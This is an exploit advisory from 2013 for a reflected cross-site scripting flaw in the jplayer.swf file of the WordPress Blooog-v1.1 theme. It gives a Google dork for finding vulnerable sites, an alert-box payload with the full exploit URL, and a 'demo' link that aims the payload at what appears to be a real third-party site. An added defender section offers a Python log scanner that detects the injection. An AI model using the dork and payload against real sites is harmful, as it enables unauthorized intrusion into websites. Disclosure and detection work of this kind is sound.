X-------------------------------------------------------------X
 _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
|_   _| | | | \ | |_   _/  ___|_   _|/ _ \ | \ | | /  __ \ \ / / ___ \  ___| ___ \
  | | | | | |  \| | | | \ `--.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
  | | | | | | . ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
  | | | |_| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
  \_/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X
 
 
[+] Author: TUNISIAN CYBER
[+] Exploit Title: WordPress Blooog-v1.1 Theme Cross Site Scripting
[+] Date: 2-12-2013
[+] Category: WebApp
[+] Google Dork: inurl:"wp-content/themes/Blooog-v1.1"
[+] Tested on: Win7, Ubuntu 13.04
 
 
########################################################################################
PoC:
http://127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf

P4yl04D:
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//

The full URL then looks like this:

http://127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//
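Added note for defenders (not part of the original advisory): the jQuery= parameter of jplayer.swf is used by the Flash player as the name of the page-side jQuery object it calls back into, so a legitimate value is a dotted JavaScript identifier such as jQuery or jQuery.jPlayer. Any value that does not fit that shape is the signature of this injection. The Python below, written for this page rather than taken from the theme or from jPlayer, scans combined-format access log lines (constructed samples, not real traffic) and flags such requests; the hostnames, IPs and log entries are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field inside a combined-format access log entry:
#   ... "GET /path?query HTTP/1.1" ...
# Non-greedy so a raw space inside the target still parses.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.*?) HTTP/[\d.]+"')

# A legitimate jQuery= value names a JavaScript object ("jQuery", "$", "jQuery.jPlayer").
# Anything that is not a dotted identifier is a callback-injection attempt.
SAFE_NAME_RE = re.compile(r'^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$')


def suspicious_jplayer_request(log_line):
    """Return the offending jQuery= value when log_line is a request for
    jplayer.swf carrying a non-identifier jQuery parameter, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/jplayer.swf"):
        return None
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() != "jquery":
            continue
        for value in values:  # parse_qs has already percent-decoded the value
            if not SAFE_NAME_RE.match(value):
                return value
    return None


def scan(lines):
    """Return (client_ip, payload) pairs for every flagged log line."""
    hits = []
    for line in lines:
        payload = suspicious_jplayer_request(line)
        if payload is not None:
            hits.append((line.split(" ", 1)[0], payload))
    return hits


# Constructed sample entries (assumed, not captured traffic): a normal player
# load, the payload from the advisory above, and the same string aimed at a
# different file, which this check deliberately ignores.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Dec/2013:10:00:01 +0000] "GET /wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=jQuery HTTP/1.1" 200 10934 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [02/Dec/2013:10:00:02 +0000] "GET /wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)// HTTP/1.1" 200 10934 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Dec/2013:10:00:03 +0000] "GET /index.php?jQuery=)}catch(e){} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, payload in scan(SAMPLE_LOG):
        print(f"{ip} requested jplayer.swf with jQuery={payload!r}")
```

A hit means the theme's bundled jplayer.swf is reachable and being probed; if the site does not rely on the Flash fallback, removing that file from the theme directory closes the exposure, and otherwise the check above doubles as a rule for a WAF or log-alerting pipeline.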

 
Demo (the rest at Google, Bing, ...):

http://www.951collegeradio.com/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//

Screenshot: http://oi40.tinypic.com/33k6sqq.jpg
########################################################################################